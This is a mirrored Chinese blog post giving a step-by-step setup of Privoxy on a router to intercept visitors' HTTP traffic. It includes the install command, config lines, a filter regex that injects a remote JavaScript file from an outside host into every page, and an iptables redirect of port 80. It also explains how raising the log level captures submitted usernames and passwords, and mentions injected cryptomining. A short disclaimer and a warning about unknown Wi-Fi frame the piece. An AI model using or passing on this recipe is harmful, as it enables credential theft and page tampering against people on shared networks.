zoukankan      html  css  js  c++  java
  • 利用privoxy劫持http网站数据,插入广告,获取用户名,密码

    看了几篇privoxy的文章,感觉讲的都不详细,在此整理一遍。

    注:本文下面的内容仅讨论思路,作为技术交流之用,请勿用作非法途径.

    Privoxy是一款带过滤功能的代理服务器,针对HTTP、HTTPS协议。通过Privoxy的过滤功能,用户可以保护隐私、对网页内容进行过滤、管理cookies,以及拦阻各种广告等。Privoxy可以用作单机,也可以应用到多用户的网络。

    Privoxy基于Internet Junkbuster,按照GNU General Public License进行发布。可以在Linux、Windows、Mac OS X、AmigaOS、BeOS,以及各种Unix上运行。

    ----来自百度百科

    privoxy功能很强大,可以用来过滤广告,那么我们也可以用它来插入广告,甚至淘宝返利....

    先上图..

    环境:免费的K3刷官改版.

    刷完系统后 安装 privoxy

    命令:

    opkg install privoxy

    然后编辑 config 文件

    vi /tmp/media/nand/opt/etc/privoxy/config
    

    修改listen-address 为如下形式

    listen-address  192.168.2.1:8118
    accept-intercepted-requests 1
    

    192.168.2.1 为 路由器IP 8118为privoxy的默认监听端口

    action 文件

    vi /tmp/media/nand/opt/etc/privoxy/user.action
    

    加入以下内容 代表拦截所有网址

    +filter{ad}}
    .*
    

    filter文件

    vi /tmp/media/nand/opt/etc/privoxy/user.filter
    
    FILTER: ad Add ad
    s||http://www.abc.com/ad.js"> $0|g
    

    很简单的正则,表示在body标签后插入一段js, 这个js里面就控制了想要插入的广告内容.

    这里只分析一下原理,就不放示例代码了... 相信各位大神,都会的....

    最后一步 把80端口的数据都转发到8118去,即privoxy监听的端口

    iptables -t nat -A PREROUTING -s 0.0.0.0/0.0.0.0 -p tcp --dport 80 -j REDIRECT --to-ports 8118
    

    最后的效果就是第一张图...所以的http网站都被插入了一段js 用来执行代码,甚至用来挖矿...

    privoxy功能不只是修改网页内容,还可以记录访问记录..

    甚至可以记录下网页提交的表单,这就意味着, 用户名和密码 也在其中..

    修改config中的debug级别即可...(默认的日志只记录请求的url.)

    至于privoxy还能干嘛,大家自己发挥吧...

    所以,,这告诉我们一个道理,不要随便连接陌生wifi...要连接也要尽量访问https网站..

    有问题请联系hudcan@sina.com 个人网站:http://ext.123456cc.cc
  • 相关阅读:
    【论文阅读-Embedding】《GloVe: Global Vectors for Word Representation》
    机器学习的问题总结
    预算平滑
    ML基础番外篇-距离度量
    vim配置使用
    强化学习 Note
    强化学习(David Silver)9:探索与利用
    强化学习(David Silver)8:集成学习和计划
    强化学习(David Silver)7:策略梯度算法
    数学基础01-最优化(梯度下降法、牛顿法、拟牛顿法等)
  • 原文地址:https://www.cnblogs.com/mysgk/p/9426995.html
Copyright © 2011-2022 走看看